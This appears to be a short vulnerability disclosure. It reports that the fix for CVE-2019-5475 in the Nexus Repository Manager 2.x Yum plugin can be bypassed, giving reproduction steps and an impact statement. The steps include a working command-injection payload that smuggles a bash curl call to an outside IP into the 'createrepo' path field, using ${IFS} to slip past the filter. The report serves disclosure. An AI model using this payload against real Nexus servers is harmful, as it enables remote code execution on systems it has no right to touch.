OS Command Injection in Nexus Repository Manager 2.x(bypass CVE-2019-5475)

Maven artifact

groupId: org.sonatype.nexus.pluginsartifactId:nexus-yum-repository-pluginversion: 2.14.14-01

Vulnerability

Vulnerability Description

The Nexus Yum Repository Plugin is vulnerable to Remote Code Execution. All instances using CommandLineExecutor.java with user-supplied data is vulnerable, such as the Yum Configuration Capability.

Additional Details

Take a look at the patch for CVE-2019-5475

https://github.com/sonatype/nexus-public/commit/7b9939e71693422d3e09adc3744fa2e9b3a62a63#diff-4ab0523de106ac7a38808f0231fc8a23R84

The getCleanCommand method is not completely filtered and can still be bypassed.

Steps To Reproduce:

1. Navigate to “Capabilities” in Nexus Repository Manager.

2. Edit or create a new Yum: Configuration capability

3. Set path of “createrepo” or “mergerepo” to an OS command (e.g. /bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo)

Supporting Material/References:

• Ubuntu
• Sonatype Nexus Repository Manager 2.14.14-01
• Java 8

Wrap up

• I contacted the maintainer to let them know: N
• I opened an issue in the related repository: N

Impact

An authenticated user with sufficient privileges in a Nexus Repository Manager installation can exploit this to execute code on the underlying operating system.

Impact

An authenticated user with sufficient privileges in a Nexus Repository Manager installation can exploit this to execute code on the underlying operating system.